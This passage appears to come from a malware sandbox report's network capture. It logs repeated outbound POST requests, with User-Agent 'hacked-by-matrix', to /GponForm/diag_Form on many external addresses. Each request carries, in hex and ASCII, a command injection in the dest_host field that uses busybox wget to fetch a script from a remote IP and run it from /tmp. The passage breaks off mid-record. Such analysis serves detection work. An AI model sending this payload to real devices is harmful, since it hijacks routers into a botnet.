                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        45192.168.2.134974042.13.255.248443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432320118 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        46192.168.2.1355516212.53.200.107443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432348013 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        47192.168.2.1334032212.247.40.203443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432405949 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        48192.168.2.13380185.82.29.190443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432430029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        49192.168.2.133395442.59.114.99443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432463884 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        50192.168.2.134003042.33.110.247443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432467937 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        51192.168.2.1353208212.90.173.83443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432483912 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        52192.168.2.1359840109.178.139.33443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432512045 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        53192.168.2.13589705.88.32.123443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432548046 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        54192.168.2.134801842.52.107.136443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432575941 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        55192.168.2.135676442.215.56.35443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432607889 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        56192.168.2.1344656212.218.251.202443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432632923 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        57192.168.2.135378442.40.244.40443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432657003 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        58192.168.2.1353294118.133.25.206443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432707071 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        59192.168.2.1342600212.236.229.120443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432744980 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        60192.168.2.1335222109.87.191.21443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432744980 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        61192.168.2.1341756212.51.64.197443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432764053 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        62192.168.2.135515042.61.229.176443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432811022 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        63192.168.2.1336712212.152.106.37443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432861090 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        64192.168.2.1340402118.86.178.158443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432862043 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        65192.168.2.13489185.252.181.166443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432919979 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        66192.168.2.1349424109.16.159.158443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432925940 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        67192.168.2.1336036118.63.239.21443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433003902 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
